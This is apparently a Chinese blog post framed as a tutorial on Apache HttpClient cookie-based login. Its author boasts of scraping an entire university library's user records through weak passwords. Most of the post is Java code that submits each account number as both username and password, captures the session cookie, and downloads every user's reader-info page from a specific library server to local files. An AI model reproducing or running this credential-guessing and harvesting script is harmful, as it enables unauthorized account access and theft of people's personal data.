使用HttpClient开源工具包访问网络比HttpURLConnection省了不少事
步骤如下:
1.使用HttpPost提交表单数据(比如用户名、密码等),然后通过HttpClient.getCookieStore().getCookies()拿到登录Cookie
2.使用HttpGet获取要得到的页面,执行的时候带上得到的Cookie数据才能正确访问
我就抓取到了整个学校图书馆的用户信息啊哈哈哈(弱密码)
代码如下
package njupt;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.Consts;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.cookie.Cookie;
import org.apache.http.impl.client.AbstractHttpClient;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import DBUtil.BaseDao;
/**
 * Small helper around Apache HttpClient 4.x that performs a form login,
 * picks up the resulting cookie, and then downloads a page with that cookie
 * attached, saving the response body to a local file.
 *
 * <p>Every method creates its own {@link DefaultHttpClient} and shuts its
 * connection manager down before returning, so no sockets are left open
 * between calls.
 */
public class HttpUtil {

    /** Login form target. NOTE(review): placeholder without a scheme; execute() will fail until a real URL is set. */
    private static final String LOGIN_URL = "www.xxxxx.com";

    /** Page fetched by {@link #getContent(Cookie, String)}. */
    private static final String READER_INFO_URL = "http://202.119.228.6:8080/reader/redr_info.php";

    /** Directory prefix that downloaded pages are written under. */
    private static final String OUTPUT_DIR = "/home/zlidentify/njupt/";

    /**
     * Posts the login form and returns the first cookie stored by the client.
     *
     * <p>The form carries {@code name} in both the {@code number} and
     * {@code passwd} fields, plus {@code select=cert_no}. A 302 status is
     * treated as a successful login.
     *
     * @param name value sent as both the {@code number} and {@code passwd} form fields
     * @return the first cookie in the client's cookie store after a 302
     *         response, or {@code null} if the request failed, the status was
     *         not 302, or no cookie was set
     */
    public Cookie postData(String name) {
        HttpClient client = new DefaultHttpClient();
        HttpPost httpPost = new HttpPost(LOGIN_URL);

        List<NameValuePair> formparams = new ArrayList<NameValuePair>();
        formparams.add(new BasicNameValuePair("number", name));
        formparams.add(new BasicNameValuePair("passwd", name));
        formparams.add(new BasicNameValuePair("select", "cert_no"));
        httpPost.setEntity(new UrlEncodedFormEntity(formparams, Consts.UTF_8));

        try {
            int responseCode = -1;
            try {
                HttpResponse response = client.execute(httpPost);
                responseCode = response.getStatusLine().getStatusCode();
            } catch (IOException e) {
                e.printStackTrace();
            } finally {
                // Always hand the connection back, even when execute() throws.
                httpPost.releaseConnection();
            }

            if (responseCode != 302) {
                System.out.println("passwd is wrong or something else is happened");
                return null;
            }
            System.out.println("302");

            List<Cookie> cookies = ((AbstractHttpClient) client).getCookieStore().getCookies();
            if (cookies.isEmpty()) {
                // A redirect without Set-Cookie would otherwise blow up on get(0).
                System.out.println("302 received but no cookie was set");
                return null;
            }
            return cookies.get(0);
        } finally {
            // Release the sockets held by this one-shot client.
            client.getConnectionManager().shutdown();
        }
    }

    /**
     * Fetches the reader-info page with the given cookie attached and writes
     * the response body to a file named {@code name}.
     *
     * @param c    cookie to send in the {@code Cookie} request header; when
     *             {@code null} the method logs a message and returns
     * @param name file name passed on to {@link #inputStream2File(String, InputStream)}
     */
    public void getContent(Cookie c, String name) {
        if (c == null) {
            System.out.println("Cookie 获取失败,获取下一个帐号信息。。。");
            return;
        }

        HttpClient client = new DefaultHttpClient();
        HttpGet httpGet = new HttpGet(READER_INFO_URL);
        httpGet.setHeader("Cookie", c.getName() + "=" + c.getValue());

        try {
            HttpResponse response = client.execute(httpGet);
            if (response.getEntity() == null) {
                // Nothing to save; avoids a NullPointerException on getContent().
                System.out.println("Response has no body, nothing written for " + name);
                return;
            }
            // try-with-resources closes the stream only if it was actually opened.
            try (InputStream inStream = response.getEntity().getContent()) {
                inputStream2File(name, inStream);
            }
        } catch (IllegalStateException | IOException e) {
            e.printStackTrace();
        } finally {
            client.getConnectionManager().shutdown();
        }
    }

    /**
     * Copies everything readable from {@code inStream} into a file under the
     * fixed output directory.
     *
     * <p>The input stream is not closed here; that stays the caller's job.
     * The success message is printed only when the copy completed without an
     * {@link IOException}.
     *
     * @param fileName name of the file to create inside the output directory
     * @param inStream source of the bytes to write
     */
    public void inputStream2File(String fileName, InputStream inStream) {
        String path = OUTPUT_DIR + fileName;
        // try-with-resources guarantees the file handle is released on failure too.
        try (OutputStream os = new FileOutputStream(path)) {
            byte[] buff = new byte[1024];
            int len;
            while ((len = inStream.read(buff)) != -1) {
                os.write(buff, 0, len);
            }
            os.flush();
        } catch (IOException e) {
            System.out.println("写入文件异常--->"+fileName);
            e.printStackTrace();
            return;
        }
        System.out.println("写入文件成功---->" + path);
    }
}
发现个更好的博客:http://blog.csdn.net/kevinpake/article/details/12981301